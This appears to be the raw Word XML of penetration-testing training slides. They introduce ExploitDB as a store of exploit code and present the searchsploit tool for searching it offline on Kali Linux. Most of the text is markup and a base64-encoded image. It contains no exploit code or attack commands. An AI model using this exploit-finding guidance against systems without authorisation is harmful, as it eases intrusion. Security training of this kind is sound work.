    <w:p w14:paraId="7160EF0A" w14:textId="77777777" w:rsidR="007A5F0C" w:rsidRDefault="006F6D33">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="4"/>
        </w:numPr>
        <w:spacing w:after="3" w:line="264" w:lineRule="auto"/>
        <w:ind w:hanging="576"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="50"/>
        </w:rPr>
        <w:t>You can use all of the different resources to determine what works best.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2EBF46D9" w14:textId="77777777" w:rsidR="007A5F0C" w:rsidRDefault="006F6D33">
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
        <w:spacing w:after="91"/>
      </w:pPr>
      <w:r>
        <w:t>ExploitDB Resources</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7B0DC22E" w14:textId="77777777" w:rsidR="007A5F0C" w:rsidRDefault="006F6D33">
      <w:pPr>
        <w:spacing w:after="292" w:line="265" w:lineRule="auto"/>
        <w:ind w:left="19" w:hanging="10"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="52"/>
        </w:rPr>
        <w:t>The exploit database maintains code to take advantage of vulnerabilities so you don't have to.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="59DF4643" w14:textId="77777777" w:rsidR="007A5F0C" w:rsidRDefault="006F6D33">
      <w:pPr>
        <w:spacing w:after="331" w:line="265" w:lineRule="auto"/>
        <w:ind w:left="16" w:hanging="10"/>
        <w:jc w:val="both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0" wp14:anchorId="3A2CE28F" wp14:editId="66FC56EC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28975" cy="5600700"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapSquare wrapText="bothSides"/>
            <wp:docPr id="54552" name="Picture 54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2" name="Picture 5455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>To stay on top of the latest exploits that are released daily, keep tabs on their Twitter account.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="65975360" w14:textId="77777777" w:rsidR="007A5F0C" w:rsidRDefault="006F6D33">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
      </w:pPr>
      <w:r>
        <w:t>https://twitter.com/ExploitDB</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="79667E4F" w14:textId="77777777" w:rsidR="007A5F0C" w:rsidRDefault="006F6D33">
      <w:pPr>
        <w:spacing w:after="331" w:line="265" w:lineRule="auto"/>
        <w:ind w:left="16" w:hanging="10"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="54"/>
        </w:rPr>
        <w:t>Additional resources can be fou</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="54"/>
        </w:rPr>
        <w:t>nd within the original ExploitDB and Offensive Security websites.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6C08A73D" w14:textId="77777777" w:rsidR="007A5F0C" w:rsidRDefault="006F6D33">
      <w:pPr>
        <w:spacing w:after="0" w:line="216" w:lineRule="auto"/>
        <w:ind w:right="3195"/>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="52"/>
          <w:u w:val="single" w:color="000000"/>
        </w:rPr>
        <w:t>https://www.exploit-db.com/ https://www.offensive-security.com/</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2304C9D2" w14:textId="77777777" w:rsidR="007A5F0C" w:rsidRDefault="006F6D33">
      <w:pPr>
        <w:spacing w:after="132"/>
        <w:ind w:left="16" w:hanging="10"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="68"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>What if your assessment has no Internet access?</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="09BF3E1B" w14:textId="77777777" w:rsidR="007A5F0C" w:rsidRDefault="006F6D33">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="5"/>
        </w:numPr>
        <w:spacing w:after="156" w:line="265" w:lineRule="auto"/>
        <w:ind w:hanging="555"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="52"/>
        </w:rPr>
        <w:t>ExploitDB also offers a command-line utility to search their database.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="08BE49DC" w14:textId="77777777" w:rsidR="007A5F0C" w:rsidRDefault="006F6D33">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="5"/>
        </w:numPr>
        <w:spacing w:after="216" w:line="265" w:lineRule="auto"/>
        <w:ind w:hanging="555"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="52"/>
        </w:rPr>
        <w:t>You can</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="52"/>
        </w:rPr>
        <w:t xml:space="preserve"> take a copy of ExploitDB with you wherever you go!</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="07242B4E" w14:textId="77777777" w:rsidR="007A5F0C" w:rsidRDefault="006F6D33">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="5"/>
        </w:numPr>
        <w:spacing w:after="200" w:line="264" w:lineRule="auto"/>
        <w:ind w:hanging="555"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="50"/>
        </w:rPr>
        <w:t>The tool lets you perform offline searches on a local copy of the repository.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="119E1386" w14:textId="77777777" w:rsidR="007A5F0C" w:rsidRDefault="006F6D33">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="5"/>
        </w:numPr>
        <w:spacing w:after="4" w:line="265" w:lineRule="auto"/>
        <w:ind w:hanging="555"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="52"/>
        </w:rPr>
        <w:t>If you are running the standard Kali Linux build, it is available by default!</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="785FBA64" w14:textId="77777777" w:rsidR="007A5F0C" w:rsidRDefault="006F6D33">
      <w:pPr>
        <w:spacing w:after="3"/>
        <w:ind w:left="61" w:hanging="10"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="70"/>
        </w:rPr>
        <w:t>Introducing searchsploit</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0B7E8FCF" w14:textId="77777777" w:rsidR="007A5F0C" w:rsidRDefault="006F6D33">
      <w:pPr>
        <w:spacing w:after="0"/>
        <w:ind w:left="-84" w:right="-1080"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="799F86CE" wp14:editId="78037C53">
            <wp:extent cx="11087100" cy="4724400"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="340742" name="Picture 340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42" name="Picture 340742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A6E2" w14:textId="77777777" w:rsidR="007A5F0C" w:rsidRDefault="006F6D33">
      <w:pPr>
        <w:spacing w:after="4"/>
        <w:ind w:left="31" w:hanging="10"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="72"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>searchsploit is very intuitive:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1D91E5CC" w14:textId="77777777" w:rsidR="007A5F0C" w:rsidRDefault="006F6D33">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="5"/>
        </w:numPr>
        <w:spacing w:after="437" w:line="265" w:lineRule="auto"/>
        <w:ind w:hanging="555"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="52"/>
        </w:rPr>
        <w:t>You can use any number of search terms.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="012997B5" w14:textId="77777777" w:rsidR="007A5F0C" w:rsidRDefault="006F6D33">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="5"/>
        </w:numPr>
        <w:spacing w:after="248"/>
        <w:ind w:hanging="555"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="50"/>
        </w:rPr>
        <w:t>By default, search terms are not case-sensitive &amp; order does not matter.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="33ADB101" w14:textId="77777777" w:rsidR="007A5F0C" w:rsidRDefault="006F6D33">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="5"/>
        </w:numPr>
        <w:spacing w:after="4" w:line="265" w:lineRule="auto"/>
        <w:ind w:hanging="555"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="52"/>
        </w:rPr>
        <w:t>Remember the biggest advantage is that you can use this utility from the command-line and offline without inter</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="52"/>
        </w:rPr>
        <w:t>net.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="296C3A53" w14:textId="77777777" w:rsidR="007A5F0C" w:rsidRDefault="006F6D33">
      <w:pPr>
        <w:spacing w:after="4"/>
        <w:ind w:left="31" w:hanging="10"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="72"/>
        </w:rPr>
        <w:t>The tool offers a local path for exploits:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="380641A8" w14:textId="77777777" w:rsidR="007A5F0C" w:rsidRDefault="006F6D33">
      <w:pPr>
        <w:spacing w:after="0"/>
        <w:ind w:left="-84" w:right="-108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8C58725" wp14:editId="0CDE6E30">
                <wp:extent cx="11087100" cy="4533900"/>
                <wp:effectExtent l="0" t="0" r="0" b="0"/>
                <wp:docPr id="333658" name="Group 3336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7100" cy="4533900"/>
                          <a:chOff x="0" y="0"/>
                          <a:chExt cx="11087100" cy="4533900"/>
                        </a:xfrm>
                      </wpg:grpSpPr>
                      <pic:pic xmlns:pic="http://schemas.openxmlformats.org/drawingml/2006/picture">
                        <pic:nvPicPr>
                          <pic:cNvPr id="340744" name="Picture 34074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7100" cy="4429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150" name="Rectangle 65150"/>
                        <wps:cNvSpPr/>
                        <wps:spPr>
                          <a:xfrm>
                            <a:off x="8486775" y="4248150"/>
                            <a:ext cx="557403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53606" w14:textId="77777777" w:rsidR="007A5F0C" w:rsidRDefault="006F6D33">
                              <w:r>
                                <w:rPr>
                                  <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
                                  <w:sz w:val="66"/>
                                </w:rPr>
                                <w:t xml:space="preserve">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51" name="Rectangle 65151"/>
                        <wps:cNvSpPr/>
                        <wps:spPr>
                          <a:xfrm>
                            <a:off x="8905875" y="4248150"/>
                            <a:ext cx="1912906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ABEAD" w14:textId="77777777" w:rsidR="007A5F0C" w:rsidRDefault="006F6D33">
                              <w:r>
                                <w:rPr>
                                  <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
                                  <w:sz w:val="60"/>
                                </w:rPr>
                                <w:t>expected!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C58725" id="Group 333658" o:spid="_x0000_s1026" style="width:873pt;height:357pt;mso-position-horizontal-relative:char;mso-position-vertical-relative:line" coordsize="110871,4533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x3QT8gIAAJwIAAAOAAAAZHJzL2Uyb0RvYy54bWzEVttO3DAQfa/U&#10;f7D8Dkk2yW42YhdVpSCkqqyg/QCv4yRWE9uyvbd+fcfOBcrSQqlUHggeX2bOnDNj79n5vm3QlmnD&#10;pVjg6DTEiAkqCy6qBf729fIkw8hYIgrSSMEW+MAMPl++f3e2UzmbyFo2BdMInAiT79QC19aqPAgM&#10;rVlLzKlUTMBiKXVLLJi6CgpNduC9bYJJGE6DndSF0pIyY2D2olvES++/LBm1N2VpmEXNAgM267/a&#10;f9fuGyzPSF5pompOexjkFShawgUEHV1dEEvQRvMjVy2nWhpZ2lMq20CWJafM5wDZROGjbK603Cif&#10;S5XvKjXSBNQ+4unVbumX7UojXixwHMfTFNQSpAWdfGjUzwFJO1XlsPdKqzu10v1E1Vku732pW/cf&#10;MkJ7T+9hpJftLaIwGUVhNotCkIHCYpLG8RwMrwCtQaajg7T+9NzRYAgdOIQjIMVpDn89YzA6Yuz5&#10;yoJTdqMZ7p20L/LREv19o05AXEUsX/OG24MvVJDRgRLbFacr3RkPyE/CWZIM5MMWFxnF3Sww5I66&#10;3e4smIGzf3G1bri65E3jNHDjHjRU+qNKeSLvrgovJN20TNiurTRrAL8UpubKYKRz1q4ZVIm+LqJO&#10;MmM1s7R2AUsIfAut5pCRfFzwKO+BOcwGiueV5ZJM5tEkdbFHzUmutLFXTLbIDQAdgACiSU62n00P&#10;Z9jSs9Yh8NAAkCtsuHjMwBdYR4z9VW/d1UQxgODc3ss7TaMUyr5rLccUEVXDUDcNGfW7x9YyvyMq&#10;S7LpbJZi5BpokmTOLZwn+dBjaTpLwrjrsDgLwyT7F8ZI3gjnXUhXWx31bgaabYDoRna/3vdZrGVx&#10;gAullvrHDTwLZSN3Cyz7EXYvBcjkVjFqrgWQ7S7lYaCHwXoYaNt8lP7q7mB82FhZcq+sC9xF6/GA&#10;iv9RzuhpOX1zvFzOeZhmf5Izgpqfh9M30NO/CWM2by2rv93hCfTN3z/X7o19aPsyuP9RsfwJAAD/&#10;/wMAUEsDBAoAAAAAAAAAIQB94NXO4poBAOKaAQAUAAAAZHJzL21lZGlhL2ltYWdlMS5qcGf/2P/g&#10;ABBKRklGAAEBAQBgAGAAAP/bAEMAAwICAwICAwMDAwQDAwQFCAUFBAQFCgcHBggMCgwMCwoLCw0O&#10;EhANDhEOCwsQFhARExQVFRUMDxcYFhQYEhQVFP/bAEMBAwQEBQQFCQUFCRQNCw0UFBQUFBQUFBQU&#10;FBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFP/AABEIAdEEj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yqooooAKKK&#10;KACiiigAorY0jw22raJrOpCcRJpqRsY9uTIXbaB146Gsy1tZb66ht4EMs8zhERerMTgCs1UjJySf&#10;w7/df8mdtTB4inGlOUNKqvHrdczjolr8UWu+hFRXStpugWuoDTJ7m6ln3eU+oQuogjfocRldzqD3&#10;3DOMgVLZ+DUXSfFUl60kd7o5jRUjYbCzOVOeORxxgisHiqaV3dbfO7svxfyPUhkWLqScKbjJrnvZ&#10;35XCDnJN7X5Yu1rqVmk3Z25Wiiius+eCirWl/Yv7Qh/tH7R9i3fvfsu3zMf7O7jP1ro/GXh3RtN0&#10;XRNT0Z75oNQ87K3xQsNhA6KMdSe57VzzrRhUjTafvbdur/Q9fD5ZVxWDrYynKNqVnJX96zlGN0uq&#10;vJI5KitDw/Dp1xrFtHq1xLa6czfvZoV3Mox2GD3x2P0qvqCW0d9cJZyPNaLIwikkXDMueCR64rXn&#10;9/kt/l95xPDtYdYjmVm3G11zaJO/LvbXR7XuivRRRVnKFFFdt8N/hHrXxR03xnfaTNZwQeFNEl16&#10;+N5Iyl4I3RCkYVWy5MgwDgYByRxkA4miu/8AiZ8Fdc+FPhzwJrOsXenTweMtIGtWENnK7yxQFygE&#10;wZFCsSCcKWGO+eK4CgAooooAKKKKACiiigAooooAKK734B+AdP8Aip8bPA3g/Vprm30zXdYtdPuZ&#10;bNlWZI5JFVihZWAbB4ypHtVP4zeDbL4d/F7xr4V02W4n0/RNavNOt5LplaV44pnRS5UAFiFGcADP&#10;YUAcdRRRQAUUVe0L+zf7c0/+2ftX9j/aI/tv2Hb9o8jcPM8vd8u/bnG7jOM0AUaK+s/jX8B/gin7&#10;Klp8YPhLeeP/AJ/FS+HZbXxpLY/8+7zM6pbJ7IAS/wDe+Xoa+TKACiivWPgz4c+D+t+EfH9x8SvF&#10;mueHfENnpwk8L2ml2fnRX11h/kmbY2BkRjBMYwxO/jFAHk9FLGvmOq9NxxXrH7UPwBm/Zn+Ll54E&#10;uNaTX57WztbmS9jtjApaaFZCoUsxwpbGcjOM4HSgDyaiiprK1e+vILaMqJJpFjUt0BJwM/nQBDRX&#10;2PqX/BL7xzYeIrjwxD8UfhLqHjOJNy+FbfxO66pKxQOqLBJApDMpBG4gYIOcc18n+LvCOseAvFGq&#10;eHPEGnzaVrel3D2t5ZzgB4pFOGBxwfYgkEYIJBoAyKKKKACiivrrWv8Agm74g8KtZw+JPjX8F/C1&#10;/dWkV6mn654rks7kRSLuRjG9uDg+vTg80AfItFe3/D39lv8A4WD4k8X6R/wt34V+Gv8AhHb37F9v&#10;8Q+JfslrqfzOvm2UnlHzovkzuwOHXjmu++J3/BPPXfhHo+oXniH4x/B+C8tdNbVYtHHiiRb+8h8s&#10;un2eF7dTIZAuExwxIwaAPlKivprwH+wb4g8afDHwp45vfih8L/BWmeJlmbTLXxb4gksLmbypTE4C&#10;mAqxDAfdY/eXOM4ry/49fs8+Nf2b/GEfh7xpYQwTXEAurG+sphPaX0BJAlhkHVSR0IDDjIGRQB5r&#10;RXr/AOyP8H9G+Pn7RHg/wH4gub6z0fWJpo7ibTZES4UJBJINjOjqOUHVTxmvMPEWnx6T4g1OxhZm&#10;itbqWFGcgsVVyATjvgUAZ9FFfR/wF/YB+LP7QOk6ZrOl2uk+G/D+qtJHpureJb8WsV9IgYskEaq8&#10;shwjnKxlcI3PBoA+cKKs6pp8mk6nd2MzK0trM8LshJUsrEEjPbIqtQAUV6d8Dv2f9Z+O15q4sde8&#10;M+FNK0iKOW/1zxbqyafY2/mMVjUuQSWYhsBVPTnHGdn4/fsoeMf2edL8P61qt/oPifwrr4f+zfEv&#10;hXURfadcOn3oxJtUhgOeVwecE7WwAeMUUV2nwY+E+r/HP4oeH/Amg3NlaavrU7QW82ou6W6sEZ8u&#10;yI7AYU9FPagDi6K+lPH/AOxDN8PfDeu6rc/HL4L6tcaRBLNJo+k+LjNqEzRg5hihMILSkjAUkc8V&#10;810AFFFFABRRRQAUUUUAFFFFABRRRQAUUUUAFFFFABRRRQAUUUUAFFFFABRRRQAUUUUAFFFFABRR&#10;RQAUUUUAFFFFABRRRQAUUUUAFFFFABRRRQAUUUUAFFFFABRRRQAUUUUAFFFFABRRRQAUUUUAFFFF&#10;ABRRRQAUUUUAFFFFABRRRQAUUUUAFFFFABRRRQAUUUUAf01fCzxlP4s03zputd9Xjn7PP/ICr2Og&#10;AooooAKKKKACiiigD+VevQfCWqx6L8OtVvGs4ryaPUIvIWcZRJChAcjvgZ4PfFefVsW/iDyPCt1o&#10;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&#10;3hSy+Hnw48MJJ/ZPhfT7h7kJLIcyTzTuA